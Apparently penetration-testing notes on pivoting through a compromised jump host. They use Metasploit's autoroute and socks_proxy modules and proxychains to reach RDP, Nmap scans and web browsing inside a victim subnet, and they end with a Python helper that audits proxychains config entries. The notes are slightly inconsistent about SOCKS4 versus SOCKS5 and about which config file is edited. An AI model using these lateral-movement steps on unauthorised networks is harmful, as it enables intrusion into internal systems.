Metasploit Tunneling

You must already have an established shell on the jump system (the host that can reach the victim's subnet).

The autoroute module creates a reverse tunnel and allows us to direct network traffic into the appropriate subnet.

@multihandler shell session
background
use multi/manage/autoroute
set session 1 (the meterpreter shell session)
exploit

use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
exploit -j

sudo bash -c 'echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf'

We can configure proxychains to force TCP traffic through the proxy by adding the SOCKS4 proxy IP and port to its config file.

sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf'
proxychains rdesktop 192.168.120.10

Proxychains can be used with many other applications. For example, we can use Nmap to conduct an internal network scan or Firefox to browse internal web sites.
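Because the two `echo ... >>` commands above append to the config rather than replace it, the ProxyList can end up with stale or conflicting entries. The following check is an added example, not part of the original notes: `parse_proxylist` and `audit` are hypothetical helper names, the sample config is constructed, and the listener is assumed to speak SOCKS5 on 127.0.0.1:1080 (the port comes from the notes, the protocol version is an assumption).

```python
# Constructed sample: a proxychains config after both `echo ... >>` commands
# from this page were run against the same file (stock tor entry still present).
SAMPLE_CONF = """\
strict_chain
proxy_dns
[ProxyList]
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
socks4 127.0.0.1 1080
"""

PROXY_TYPES = {"http", "socks4", "socks5"}

def parse_proxylist(text):
    """Return (lineno, type, host, port) for each entry under [ProxyList]."""
    entries, in_list = [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if line.startswith("["):
            in_list = line.lower() == "[proxylist]"
            continue
        f = line.split()
        if in_list and len(f) >= 3 and f[0].lower() in PROXY_TYPES and f[2].isdigit():
            entries.append((lineno, f[0].lower(), f[1], int(f[2])))
    return entries

def audit(text, listener=("socks5", "127.0.0.1", 1080)):
    """Compare the ProxyList with the local SOCKS listener (assumed SOCKS5 here)."""
    want_type, want_host, want_port = listener
    strict = any(ln.split("#", 1)[0].strip() == "strict_chain" for ln in text.splitlines())
    findings, matched = [], False
    for lineno, ptype, host, port in parse_proxylist(text):
        if (host, port) != (want_host, want_port):
            note = "; strict_chain needs every hop up" if strict else ""
            findings.append(f"line {lineno}: {ptype} {host}:{port} is not the listener{note}")
        elif ptype != want_type:
            findings.append(f"line {lineno}: {ptype} does not match {want_type} listener")
        else:
            matched = True
    if not matched:
        findings.append(f"no {want_type} entry for {want_host}:{want_port}")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF):
        print(finding)
```

Pass the contents of the real config file to `audit` and set `listener` to whatever the SOCKS server is actually configured to speak.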
